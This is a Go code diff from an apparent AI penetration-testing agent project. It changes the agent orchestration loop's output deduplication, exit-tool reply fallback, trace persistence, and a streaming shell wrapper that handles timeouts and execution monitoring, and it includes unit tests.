progress("response_delta", body, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
"einoRole": "orchestrator",
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
}
|
||||
lastAssistant = body
|
||||
if orchMode == "plan_execute" && strings.EqualFold(strings.TrimSpace(ev.AgentName), "executor") {
|
||||
lastPlanExecuteExecutor = UnwrapPlanExecuteUserText(body)
|
||||
executeStdoutDupMu.Lock()
|
||||
dup := pendingExecuteStdoutDup
|
||||
if dup != "" && body == dup {
|
||||
pendingExecuteStdoutDup = ""
|
||||
executeStdoutDupMu.Unlock()
|
||||
lastAssistant = body
|
||||
if orchMode == "plan_execute" && strings.EqualFold(strings.TrimSpace(ev.AgentName), "executor") {
|
||||
lastPlanExecuteExecutor = UnwrapPlanExecuteUserText(body)
|
||||
}
|
||||
// 非流式:与 execute 输出相同则跳过助手通道展示(msg 已在上方写入 runAccumulatedMsgs)
|
||||
} else {
|
||||
if dup != "" {
|
||||
pendingExecuteStdoutDup = ""
|
||||
}
|
||||
executeStdoutDupMu.Unlock()
|
||||
if progress != nil {
|
||||
progress("response_start", "", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
"messageGeneratedBy": "eino:" + ev.AgentName,
|
||||
"einoRole": "orchestrator",
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
progress("response_delta", body, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
"einoRole": "orchestrator",
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
}
|
||||
lastAssistant = body
|
||||
if orchMode == "plan_execute" && strings.EqualFold(strings.TrimSpace(ev.AgentName), "executor") {
|
||||
lastPlanExecuteExecutor = UnwrapPlanExecuteUserText(body)
|
||||
}
|
||||
}
|
||||
} else if progress != nil {
|
||||
progress("eino_agent_reply", body, map[string]interface{}{
|
||||
@@ -657,12 +915,19 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
break
|
||||
}
|
||||
}
|
||||
} else {
|
||||
removePendingByID(toolCallID)
|
||||
}
|
||||
if toolCallID != "" {
|
||||
removePendingByID(toolCallID)
|
||||
if _, loaded := toolResultSent.LoadOrStore(toolCallID, struct{}{}); loaded {
|
||||
// ToolInvokeNotify 可能已推过 tool_result(如 execute 流式包装里 Fire 仅携带截断后的 stdout),
|
||||
// 此处仍应用 ADK Tool 消息中的完整内容刷新去重基准,避免模型复述全文时与截断串比对失败而重复展示「助手输出」。
|
||||
recordPendingExecuteStdoutDup(toolName, content, isErr)
|
||||
continue
|
||||
}
|
||||
data["toolCallId"] = toolCallID
|
||||
}
|
||||
recordPendingExecuteStdoutDup(toolName, content, isErr)
|
||||
recordEinoADKFilesystemToolMonitor(args.FilesystemMonitorAgent, args.FilesystemMonitorRecord, toolName, toolCallID, runAccumulatedMsgs, content, isErr)
|
||||
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), data)
|
||||
}
|
||||
}
|
||||
@@ -672,26 +937,52 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
mcpIDsMu.Unlock()
|
||||
|
||||
out := buildEinoRunResultFromAccumulated(
|
||||
orchMode, runAccumulatedMsgs, lastAssistant, lastPlanExecuteExecutor, emptyHint, ids, false,
|
||||
orchMode, runAccumulatedMsgs, persistTraceSource(args, runAccumulatedMsgs),
|
||||
lastAssistant, lastPlanExecuteExecutor, emptyHint, ids, false,
|
||||
)
|
||||
return out, nil
|
||||
}
|
||||
|
||||
func persistTraceSource(args *einoADKRunLoopArgs, fallback []adk.Message) []adk.Message {
|
||||
if args != nil && args.ModelFacingTrace != nil {
|
||||
if snap := args.ModelFacingTrace.Snapshot(); len(snap) > 0 {
|
||||
return snap
|
||||
}
|
||||
}
|
||||
return fallback
|
||||
}
|
||||
|
||||
func einoPartialRunLastOutputHint() string {
|
||||
return "[执行未正常结束(用户停止、超时或异常)。续跑时请基于上文已产生的工具与结果继续,勿重复已完成步骤。]\n" +
|
||||
"[Run ended abnormally; continue from the trace above without repeating completed steps.]"
|
||||
}
|
||||
|
||||
// friendlyEinoExecuteInvokeTail 将 Eino execute 等非 MCP 路径的结尾错误转成简短提示;其它情况保留原 error 文本。
|
||||
func friendlyEinoExecuteInvokeTail(invokeErr error) string {
|
||||
if invokeErr == nil {
|
||||
return ""
|
||||
}
|
||||
if errors.Is(invokeErr, context.DeadlineExceeded) {
|
||||
return einoExecuteTimeoutUserHint()
|
||||
}
|
||||
return "[执行未正常结束] " + invokeErr.Error()
|
||||
}
|
||||
|
||||
func buildEinoRunResultFromAccumulated(
|
||||
orchMode string,
|
||||
runAccumulatedMsgs []adk.Message,
|
||||
persistMsgs []adk.Message,
|
||||
lastAssistant string,
|
||||
lastPlanExecuteExecutor string,
|
||||
emptyHint string,
|
||||
mcpIDs []string,
|
||||
partial bool,
|
||||
) *RunResult {
|
||||
histJSON, _ := json.Marshal(runAccumulatedMsgs)
|
||||
traceForJSON := persistMsgs
|
||||
if len(traceForJSON) == 0 {
|
||||
traceForJSON = runAccumulatedMsgs
|
||||
}
|
||||
histJSON, _ := json.Marshal(traceForJSON)
|
||||
cleaned := strings.TrimSpace(lastAssistant)
|
||||
if orchMode == "plan_execute" {
|
||||
if e := strings.TrimSpace(lastPlanExecuteExecutor); e != "" {
|
||||
@@ -700,6 +991,11 @@ func buildEinoRunResultFromAccumulated(
|
||||
cleaned = UnwrapPlanExecuteUserText(cleaned)
|
||||
}
|
||||
}
|
||||
if cleaned == "" {
|
||||
if fb := strings.TrimSpace(einoExtractFallbackAssistantFromMsgs(runAccumulatedMsgs)); fb != "" {
|
||||
cleaned = fb
|
||||
}
|
||||
}
|
||||
cleaned = dedupeRepeatedParagraphs(cleaned, 80)
|
||||
cleaned = dedupeParagraphsByLineFingerprint(cleaned, 100)
|
||||
// 防止超长响应导致 JSON 序列化慢或 OOM(多代理拼接大量工具输出时可能触发)。
|
||||
@@ -726,6 +1022,79 @@ func buildEinoRunResultFromAccumulated(
|
||||
return out
|
||||
}
|
||||
|
||||
// einoExtractFallbackAssistantFromMsgs 在「主通道未产出助手正文」时,从 Eino ADK 轨迹中回填用户可见回复。
|
||||
// 典型场景:监督者仅调用 exit(final_result 落在 Tool 消息中),或工具结果已写入历史但 lastAssistant 未更新。
|
||||
//
|
||||
// 优先级:最后一次 exit 工具输出 → 最后一条含 exit 的助手 tool_calls 参数中的 final_result。
|
||||
func einoExtractFallbackAssistantFromMsgs(msgs []adk.Message) string {
|
||||
for i := len(msgs) - 1; i >= 0; i-- {
|
||||
m := msgs[i]
|
||||
if m == nil || m.Role != schema.Tool {
|
||||
continue
|
||||
}
|
||||
if !strings.EqualFold(strings.TrimSpace(m.ToolName), adk.ToolInfoExit.Name) {
|
||||
continue
|
||||
}
|
||||
content := strings.TrimSpace(m.Content)
|
||||
if content == "" || strings.HasPrefix(content, einomcp.ToolErrorPrefix) {
|
||||
continue
|
||||
}
|
||||
return content
|
||||
}
|
||||
for i := len(msgs) - 1; i >= 0; i-- {
|
||||
m := msgs[i]
|
||||
if m == nil || m.Role != schema.Assistant {
|
||||
continue
|
||||
}
|
||||
if s := einoExtractExitFinalFromAssistantToolCalls(m); s != "" {
|
||||
return s
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func einoExtractExitFinalFromAssistantToolCalls(msg *schema.Message) string {
|
||||
if msg == nil || len(msg.ToolCalls) == 0 {
|
||||
return ""
|
||||
}
|
||||
for i := len(msg.ToolCalls) - 1; i >= 0; i-- {
|
||||
tc := msg.ToolCalls[i]
|
||||
if !strings.EqualFold(strings.TrimSpace(tc.Function.Name), adk.ToolInfoExit.Name) {
|
||||
continue
|
||||
}
|
||||
if s := einoParseExitFinalResultArguments(tc.Function.Arguments); s != "" {
|
||||
return s
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func einoParseExitFinalResultArguments(arguments string) string {
|
||||
arguments = strings.TrimSpace(arguments)
|
||||
if arguments == "" {
|
||||
return ""
|
||||
}
|
||||
var wrap struct {
|
||||
FinalResult json.RawMessage `json:"final_result"`
|
||||
}
|
||||
if err := json.Unmarshal([]byte(arguments), &wrap); err != nil || len(wrap.FinalResult) == 0 {
|
||||
return ""
|
||||
}
|
||||
var s string
|
||||
if err := json.Unmarshal(wrap.FinalResult, &s); err == nil {
|
||||
return strings.TrimSpace(s)
|
||||
}
|
||||
var anyVal interface{}
|
||||
if err := json.Unmarshal(wrap.FinalResult, &anyVal); err != nil {
|
||||
return ""
|
||||
}
|
||||
b, err := json.Marshal(anyVal)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
return strings.TrimSpace(string(b))
|
||||
}
|
||||
|
||||
func buildEinoCheckpointID(orchMode string) string {
|
||||
mode := sanitizeEinoPathSegment(strings.TrimSpace(orchMode))
|
||||
if mode == "" {
|
||||
|
||||
@@ -0,0 +1,31 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
|
||||
"cyberstrike-ai/internal/agent"
|
||||
"cyberstrike-ai/internal/einomcp"
|
||||
)
|
||||
|
||||
// newEinoExecuteMonitorCallback 在 Eino filesystem execute 结束时写入 MCP 监控库并 recorder(executionId),
|
||||
// 与 CallTool 路径一致,供助手消息展示「渗透测试详情」芯片。
|
||||
func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRecorder) func(command, stdout string, success bool, invokeErr error) {
|
||||
return func(command, stdout string, success bool, invokeErr error) {
|
||||
if ag == nil || recorder == nil {
|
||||
return
|
||||
}
|
||||
var err error
|
||||
if !success {
|
||||
if invokeErr != nil {
|
||||
err = invokeErr
|
||||
} else {
|
||||
err = fmt.Errorf("execute failed")
|
||||
}
|
||||
}
|
||||
args := map[string]interface{}{"command": command}
|
||||
id := ag.RecordLocalToolExecution("execute", args, stdout, err)
|
||||
if id != "" {
|
||||
recorder(id)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,186 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/einomcp"
|
||||
"cyberstrike-ai/internal/security"
|
||||
|
||||
"github.com/cloudwego/eino/adk/filesystem"
|
||||
"github.com/cloudwego/eino/compose"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
// prependPythonUnbufferedEnv 为 /bin/sh -c 注入 PYTHONUNBUFFERED=1。
|
||||
// eino-ext local 对流式 stdout 使用 bufio 按「行」推送;python3 写管道时默认块缓冲,print 长期留在用户态缓冲,
|
||||
// 管道里收不到换行,表现为长时间无输出直至超时或退出。若命令里已出现 PYTHONUNBUFFERED 则不再覆盖。
|
||||
func prependPythonUnbufferedEnv(shellCommand string) string {
|
||||
if strings.TrimSpace(shellCommand) == "" {
|
||||
return shellCommand
|
||||
}
|
||||
if strings.Contains(strings.ToUpper(shellCommand), "PYTHONUNBUFFERED") {
|
||||
return shellCommand
|
||||
}
|
||||
return "export PYTHONUNBUFFERED=1\n" + shellCommand
|
||||
}
|
||||
|
||||
// einoExecuteTimeoutUserHint 与写入 ADK 工具消息(模型可见)及 SSE tool_result 尾标一致。
|
||||
func einoExecuteTimeoutUserHint() string {
|
||||
return "已超时终止 · Timed out"
|
||||
}
|
||||
|
||||
// einoStreamingShellWrap 包装 Eino filesystem 使用的 StreamingShell(cloudwego eino-ext local.Local)。
|
||||
// 官方 execute 工具默认走 ExecuteStreaming 且不设 RunInBackendGround;末尾带 & 时子进程仍与管道相连,
|
||||
// streamStdout 按行读取会在无换行输出时长时间阻塞(与 MCP 工具 exec 的独立实现不同)。
|
||||
// 对「完全后台」命令自动开启 RunInBackendGround,与 local.runCmdInBackground 行为对齐。
|
||||
//
|
||||
// 使用 Pipe 将内层流转发给调用方:在 inner EOF 后、关闭 Pipe 前同步调用 ToolInvokeNotify.Fire,
|
||||
// 保证 run loop 在模型开始下一轮输出前已记录 execute 结果(用于 UI 与「重复助手复述」去重)。
|
||||
//
|
||||
// 若 inner 在校验阶段直接返回 error(未建立 reader),不会进入下方 goroutine,也必须 Fire;
|
||||
// 否则 pending tool_call 要等整轮 run 结束才被 force-close,与已展示的助手/工具软错误文案不同步。
|
||||
type einoStreamingShellWrap struct {
|
||||
inner filesystem.StreamingShell
|
||||
invokeNotify *einomcp.ToolInvokeNotifyHolder
|
||||
einoAgentName string
|
||||
// outputChunk 可选;非 nil 时在收到内层 ExecuteResponse 片段时推送,与 MCP 工具的 tool_result_delta 一致(需有效 toolCallId)。
|
||||
outputChunk func(toolName, toolCallID, chunk string)
|
||||
// toolTimeoutMinutes 与 agent.tool_timeout_minutes 对齐;>0 时对单次 execute 套用 context 超时(与 MCP 工具经 executeToolViaMCP 行为一致)。0 表示仅依赖上层 ctx(如整任务 10h 上限)。
|
||||
toolTimeoutMinutes int
|
||||
// recordMonitor 在 execute 流结束后写入 tool_executions 并 recorder(executionId),使「渗透测试详情」与常规 MCP 一致。
|
||||
recordMonitor func(command, stdout string, success bool, invokeErr error)
|
||||
}
|
||||
|
||||
func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) {
|
||||
if w.inner == nil {
|
||||
return nil, fmt.Errorf("einoStreamingShellWrap: inner shell is nil")
|
||||
}
|
||||
if input == nil {
|
||||
return w.inner.ExecuteStreaming(ctx, nil)
|
||||
}
|
||||
req := *input
|
||||
userCmd := strings.TrimSpace(req.Command)
|
||||
if security.IsBackgroundShellCommand(req.Command) && !req.RunInBackendGround {
|
||||
req.RunInBackendGround = true
|
||||
}
|
||||
req.Command = prependPythonUnbufferedEnv(req.Command)
|
||||
tid := strings.TrimSpace(compose.GetToolCallID(ctx))
|
||||
agentTag := strings.TrimSpace(w.einoAgentName)
|
||||
|
||||
execCtx := ctx
|
||||
var execCancel context.CancelFunc
|
||||
if w.toolTimeoutMinutes > 0 {
|
||||
execCtx, execCancel = context.WithTimeout(ctx, time.Duration(w.toolTimeoutMinutes)*time.Minute)
|
||||
}
|
||||
|
||||
sr, err := w.inner.ExecuteStreaming(execCtx, &req)
|
||||
if err != nil {
|
||||
if execCancel != nil {
|
||||
execCancel()
|
||||
}
|
||||
if w.recordMonitor != nil {
|
||||
w.recordMonitor(userCmd, "", false, err)
|
||||
}
|
||||
if w.invokeNotify != nil && tid != "" {
|
||||
w.invokeNotify.Fire(tid, "execute", agentTag, false, "", err)
|
||||
}
|
||||
return nil, err
|
||||
}
|
||||
if sr == nil || w.invokeNotify == nil || tid == "" {
|
||||
if execCancel != nil {
|
||||
execCancel()
|
||||
}
|
||||
return sr, nil
|
||||
}
|
||||
|
||||
outR, outW := schema.Pipe[*filesystem.ExecuteResponse](32)
|
||||
|
||||
go func(inner *schema.StreamReader[*filesystem.ExecuteResponse], command string, cancel context.CancelFunc, tctx context.Context) {
|
||||
defer inner.Close()
|
||||
if cancel != nil {
|
||||
defer cancel()
|
||||
}
|
||||
|
||||
var sb strings.Builder
|
||||
const maxCapture = 16 * 1024
|
||||
success := true
|
||||
var invokeErr error
|
||||
exitCode := 0
|
||||
hasExitCode := false
|
||||
|
||||
for {
|
||||
resp, rerr := inner.Recv()
|
||||
if errors.Is(rerr, io.EOF) {
|
||||
break
|
||||
}
|
||||
if rerr != nil {
|
||||
success = false
|
||||
invokeErr = rerr
|
||||
_ = outW.Send(nil, rerr)
|
||||
break
|
||||
}
|
||||
if resp != nil {
|
||||
if resp.ExitCode != nil {
|
||||
hasExitCode = true
|
||||
exitCode = *resp.ExitCode
|
||||
}
|
||||
var appended string
|
||||
if remain := maxCapture - sb.Len(); remain > 0 {
|
||||
out := resp.Output
|
||||
if len(out) > remain {
|
||||
out = out[:remain]
|
||||
}
|
||||
sb.WriteString(out)
|
||||
appended = out
|
||||
}
|
||||
// 仅推送写入 sb 的片段,与末尾 Fire/recordMonitor 的截断累计一致,避免最终 tool_result 短于已展示增量。
|
||||
if w.outputChunk != nil && strings.TrimSpace(appended) != "" {
|
||||
w.outputChunk("execute", tid, appended)
|
||||
}
|
||||
if outW.Send(resp, nil) {
|
||||
success = false
|
||||
invokeErr = fmt.Errorf("execute stream closed by consumer")
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if success && hasExitCode && exitCode != 0 {
|
||||
success = false
|
||||
invokeErr = fmt.Errorf("execute exited with code %d", exitCode)
|
||||
}
|
||||
// WithTimeout 触发后,子进程常被信号结束,local 侧多报 exit -1 / canceled,错误链里不一定带 DeadlineExceeded。
|
||||
// 用执行所用 ctx 归一化,便于 UI 展示「超时」而非含糊的 -1。
|
||||
if tctx != nil && errors.Is(tctx.Err(), context.DeadlineExceeded) {
|
||||
success = false
|
||||
invokeErr = context.DeadlineExceeded
|
||||
}
|
||||
// ADK 从本 Pipe 拼出 tool 消息正文;仅 Notify 尾标不会进入模型上下文。超时句写入流,与 UI 一致。
|
||||
if invokeErr != nil && errors.Is(invokeErr, context.DeadlineExceeded) {
|
||||
hint := "\n\n" + einoExecuteTimeoutUserHint() + "\n"
|
||||
_ = outW.Send(&filesystem.ExecuteResponse{Output: hint}, nil)
|
||||
if w.outputChunk != nil && tid != "" {
|
||||
w.outputChunk("execute", tid, hint)
|
||||
}
|
||||
if remain := maxCapture - sb.Len(); remain > 0 {
|
||||
h := hint
|
||||
if len(h) > remain {
|
||||
h = h[:remain]
|
||||
}
|
||||
sb.WriteString(h)
|
||||
}
|
||||
}
|
||||
if w.recordMonitor != nil {
|
||||
w.recordMonitor(command, sb.String(), success, invokeErr)
|
||||
}
|
||||
w.invokeNotify.Fire(tid, "execute", agentTag, success, sb.String(), invokeErr)
|
||||
outW.Close()
|
||||
}(sr, userCmd, execCancel, execCtx)
|
||||
|
||||
return outR, nil
|
||||
}
|
||||
@@ -0,0 +1,62 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
func TestEinoExtractFallbackAssistantFromMsgs_exitToolMessage(t *testing.T) {
|
||||
u := schema.UserMessage("hi")
|
||||
tm := schema.ToolMessage("answer for user", "call-exit-1")
|
||||
tm.ToolName = "exit"
|
||||
if got := einoExtractFallbackAssistantFromMsgs([]*schema.Message{u, tm}); got != "answer for user" {
|
||||
t.Fatalf("got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestEinoExtractFallbackAssistantFromMsgs_lastExitWins(t *testing.T) {
|
||||
msgs := []*schema.Message{
|
||||
schema.UserMessage("hi"),
|
||||
toolExitMsg("first", "c1"),
|
||||
toolExitMsg("second", "c2"),
|
||||
}
|
||||
if got := einoExtractFallbackAssistantFromMsgs(msgs); got != "second" {
|
||||
t.Fatalf("got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestEinoExtractFallbackAssistantFromMsgs_fromAssistantToolCalls(t *testing.T) {
|
||||
m := schema.AssistantMessage("", []schema.ToolCall{{
|
||||
ID: "x",
|
||||
Type: "function",
|
||||
Function: schema.FunctionCall{
|
||||
Name: "exit",
|
||||
Arguments: `{"final_result":"from args"}`,
|
||||
},
|
||||
}})
|
||||
if got := einoExtractFallbackAssistantFromMsgs([]*schema.Message{m}); got != "from args" {
|
||||
t.Fatalf("got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestEinoExtractFallbackAssistantFromMsgs_prefersToolOverEarlierAssistant(t *testing.T) {
|
||||
asst := schema.AssistantMessage("", []schema.ToolCall{{
|
||||
ID: "x",
|
||||
Type: "function",
|
||||
Function: schema.FunctionCall{
|
||||
Name: "exit",
|
||||
Arguments: `{"final_result":"from args"}`,
|
||||
},
|
||||
}})
|
||||
tool := toolExitMsg("from tool", "c1")
|
||||
if got := einoExtractFallbackAssistantFromMsgs([]*schema.Message{asst, tool}); got != "from tool" {
|
||||
t.Fatalf("got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func toolExitMsg(content, callID string) *schema.Message {
|
||||
m := schema.ToolMessage(content, callID)
|
||||
m.ToolName = "exit"
|
||||
return m
|
||||
}
|
||||
@@ -0,0 +1,101 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/agent"
|
||||
"cyberstrike-ai/internal/einomcp"
|
||||
|
||||
"github.com/cloudwego/eino/adk"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
// einoADKFilesystemToolNames 与 cloudwego/eino/adk/middlewares/filesystem 默认 ToolName* 一致。
|
||||
// execute 已由 eino_execute_monitor 落库,此处不包含。
|
||||
var einoADKFilesystemToolNames = map[string]struct{}{
|
||||
"ls": {},
|
||||
"read_file": {},
|
||||
"write_file": {},
|
||||
"edit_file": {},
|
||||
"glob": {},
|
||||
"grep": {},
|
||||
}
|
||||
|
||||
func isBuiltinEinoADKFilesystemToolName(name string) bool {
|
||||
n := strings.ToLower(strings.TrimSpace(name))
|
||||
_, ok := einoADKFilesystemToolNames[n]
|
||||
return ok
|
||||
}
|
||||
|
||||
func toolCallArgsFromAccumulated(msgs []adk.Message, toolCallID, expectToolName string) map[string]interface{} {
|
||||
tid := strings.TrimSpace(toolCallID)
|
||||
expect := strings.TrimSpace(expectToolName)
|
||||
for i := len(msgs) - 1; i >= 0; i-- {
|
||||
m := msgs[i]
|
||||
if m == nil || m.Role != schema.Assistant || len(m.ToolCalls) == 0 {
|
||||
continue
|
||||
}
|
||||
for j := len(m.ToolCalls) - 1; j >= 0; j-- {
|
||||
tc := m.ToolCalls[j]
|
||||
if tid != "" && strings.TrimSpace(tc.ID) != tid {
|
||||
continue
|
||||
}
|
||||
fn := strings.TrimSpace(tc.Function.Name)
|
||||
if expect != "" && !strings.EqualFold(fn, expect) {
|
||||
continue
|
||||
}
|
||||
raw := strings.TrimSpace(tc.Function.Arguments)
|
||||
if raw == "" {
|
||||
return map[string]interface{}{}
|
||||
}
|
||||
var args map[string]interface{}
|
||||
if err := json.Unmarshal([]byte(raw), &args); err != nil {
|
||||
return map[string]interface{}{"arguments_raw": raw}
|
||||
}
|
||||
if args == nil {
|
||||
return map[string]interface{}{}
|
||||
}
|
||||
return args
|
||||
}
|
||||
}
|
||||
return map[string]interface{}{}
|
||||
}
|
||||
|
||||
// recordEinoADKFilesystemToolMonitor 将 Eino ADK filesystem 中间件工具结果写入 MCP 监控(与 execute / MCP 桥芯片一致)。
|
||||
func recordEinoADKFilesystemToolMonitor(
|
||||
ag *agent.Agent,
|
||||
rec einomcp.ExecutionRecorder,
|
||||
toolName string,
|
||||
toolCallID string,
|
||||
msgs []adk.Message,
|
||||
resultText string,
|
||||
isErr bool,
|
||||
) {
|
||||
if ag == nil || rec == nil {
|
||||
return
|
||||
}
|
||||
name := strings.TrimSpace(toolName)
|
||||
if name == "" || strings.EqualFold(name, "execute") {
|
||||
return
|
||||
}
|
||||
if !isBuiltinEinoADKFilesystemToolName(name) {
|
||||
return
|
||||
}
|
||||
args := toolCallArgsFromAccumulated(msgs, toolCallID, name)
|
||||
storedName := "eino_fs::" + strings.ToLower(name)
|
||||
var invErr error
|
||||
if isErr {
|
||||
t := strings.TrimSpace(resultText)
|
||||
if t == "" {
|
||||
invErr = errors.New("tool error")
|
||||
} else {
|
||||
invErr = errors.New(t)
|
||||
}
|
||||
}
|
||||
id := ag.RecordLocalToolExecution(storedName, args, resultText, invErr)
|
||||
if id != "" {
|
||||
rec(id)
|
||||
}
|
||||
}
|
||||
@@ -161,6 +161,8 @@ func buildReductionMiddleware(ctx context.Context, mw config.MultiAgentEinoMiddl
|
||||
}
|
||||
|
||||
// prependEinoMiddlewares returns handlers to prepend (outermost first) and optionally replaces tools when tool_search is used.
|
||||
// toolSearchActive is true when the toolsearch middleware was mounted (dynamic tools split off); callers should pass this to
|
||||
// injectToolNamesOnlyInstruction — tool_search is not part of the pre-middleware tools list, so name-scanning alone cannot detect it.
|
||||
func prependEinoMiddlewares(
|
||||
ctx context.Context,
|
||||
mw *config.MultiAgentEinoMiddlewareConfig,
|
||||
@@ -170,16 +172,16 @@ func prependEinoMiddlewares(
|
||||
skillsRoot string,
|
||||
conversationID string,
|
||||
logger *zap.Logger,
|
||||
) (outTools []tool.BaseTool, extraHandlers []adk.ChatModelAgentMiddleware, err error) {
|
||||
) (outTools []tool.BaseTool, extraHandlers []adk.ChatModelAgentMiddleware, toolSearchActive bool, err error) {
|
||||
if mw == nil {
|
||||
return tools, nil, nil
|
||||
return tools, nil, false, nil
|
||||
}
|
||||
outTools = tools
|
||||
|
||||
if mw.PatchToolCallsEffective() {
|
||||
patchMW, perr := patchtoolcalls.New(ctx, &patchtoolcalls.Config{})
|
||||
if perr != nil {
|
||||
return nil, nil, fmt.Errorf("patchtoolcalls: %w", perr)
|
||||
return nil, nil, false, fmt.Errorf("patchtoolcalls: %w", perr)
|
||||
}
|
||||
extraHandlers = append(extraHandlers, patchMW)
|
||||
}
|
||||
@@ -190,7 +192,7 @@ func prependEinoMiddlewares(
|
||||
} else {
|
||||
redMW, rerr := buildReductionMiddleware(ctx, *mw, conversationID, einoLoc, logger)
|
||||
if rerr != nil {
|
||||
return nil, nil, rerr
|
||||
return nil, nil, false, rerr
|
||||
}
|
||||
extraHandlers = append(extraHandlers, redMW)
|
||||
}
|
||||
@@ -209,10 +211,11 @@ func prependEinoMiddlewares(
|
||||
if split && len(dynamic) > 0 {
|
||||
ts, terr := toolsearch.New(ctx, &toolsearch.Config{DynamicTools: dynamic})
|
||||
if terr != nil {
|
||||
return nil, nil, fmt.Errorf("toolsearch: %w", terr)
|
||||
return nil, nil, false, fmt.Errorf("toolsearch: %w", terr)
|
||||
}
|
||||
extraHandlers = append(extraHandlers, ts)
|
||||
outTools = static
|
||||
toolSearchActive = true
|
||||
if logger != nil {
|
||||
logger.Info("eino middleware: tool_search enabled",
|
||||
zap.Int("static_tools", len(static)),
|
||||
@@ -233,12 +236,12 @@ func prependEinoMiddlewares(
|
||||
}
|
||||
baseDir := filepath.Join(skillsRoot, rel, sanitizeEinoPathSegment(conversationID))
|
||||
if mk := os.MkdirAll(baseDir, 0o755); mk != nil {
|
||||
return nil, nil, fmt.Errorf("plantask mkdir: %w", mk)
|
||||
return nil, nil, toolSearchActive, fmt.Errorf("plantask mkdir: %w", mk)
|
||||
}
|
||||
ptBE := &localPlantaskBackend{Local: einoLoc}
|
||||
pt, perr := plantask.New(ctx, &plantask.Config{Backend: ptBE, BaseDir: baseDir})
|
||||
if perr != nil {
|
||||
return nil, nil, fmt.Errorf("plantask: %w", perr)
|
||||
return nil, nil, toolSearchActive, fmt.Errorf("plantask: %w", perr)
|
||||
}
|
||||
extraHandlers = append(extraHandlers, pt)
|
||||
if logger != nil {
|
||||
@@ -247,7 +250,7 @@ func prependEinoMiddlewares(
|
||||
}
|
||||
}
|
||||
|
||||
return outTools, extraHandlers, nil
|
||||
return outTools, extraHandlers, toolSearchActive, nil
|
||||
}
|
||||
|
||||
func deepExtrasFromConfig(ma *config.MultiAgentConfig) (outputKey string, retry *adk.ModelRetryConfig, taskDesc func(context.Context, []adk.Agent) (string, error)) {
|
||||
|
||||
@@ -0,0 +1,84 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"sync"
|
||||
|
||||
"github.com/cloudwego/eino/adk"
|
||||
)
|
||||
|
||||
// modelFacingTraceHolder 保存「即将送入 ChatModel」的消息快照(已走 summarization / reduction / orphan 修剪等),
|
||||
// 用于 last_react_input 落库,使续跑与「上下文压缩后」的模型视角一致,而非仅依赖事件流 append 的 runAccumulatedMsgs。
|
||||
type modelFacingTraceHolder struct {
|
||||
mu sync.Mutex
|
||||
// msgs 为深拷贝后的切片,避免框架后续原地修改污染快照
|
||||
msgs []adk.Message
|
||||
}
|
||||
|
||||
func newModelFacingTraceHolder() *modelFacingTraceHolder {
|
||||
return &modelFacingTraceHolder{}
|
||||
}
|
||||
|
||||
// Snapshot 返回当前快照的再一次深拷贝(供序列化落库,避免与 holder 互斥长期持锁)。
|
||||
func (h *modelFacingTraceHolder) Snapshot() []adk.Message {
|
||||
if h == nil {
|
||||
return nil
|
||||
}
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
return cloneADKMessagesForTrace(h.msgs)
|
||||
}
|
||||
|
||||
func (h *modelFacingTraceHolder) storeFromState(state *adk.ChatModelAgentState) {
|
||||
if h == nil || state == nil || len(state.Messages) == 0 {
|
||||
return
|
||||
}
|
||||
cloned := cloneADKMessagesForTrace(state.Messages)
|
||||
if len(cloned) == 0 {
|
||||
return
|
||||
}
|
||||
h.mu.Lock()
|
||||
h.msgs = cloned
|
||||
h.mu.Unlock()
|
||||
}
|
||||
|
||||
func cloneADKMessagesForTrace(msgs []adk.Message) []adk.Message {
|
||||
if len(msgs) == 0 {
|
||||
return nil
|
||||
}
|
||||
b, err := json.Marshal(msgs)
|
||||
if err != nil {
|
||||
return nil
|
||||
}
|
||||
var out []adk.Message
|
||||
if err := json.Unmarshal(b, &out); err != nil {
|
||||
return nil
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
// modelFacingTraceMiddleware 必须在 Handlers 链中处于 **BeforeModel 最后**(telemetry 之后),
|
||||
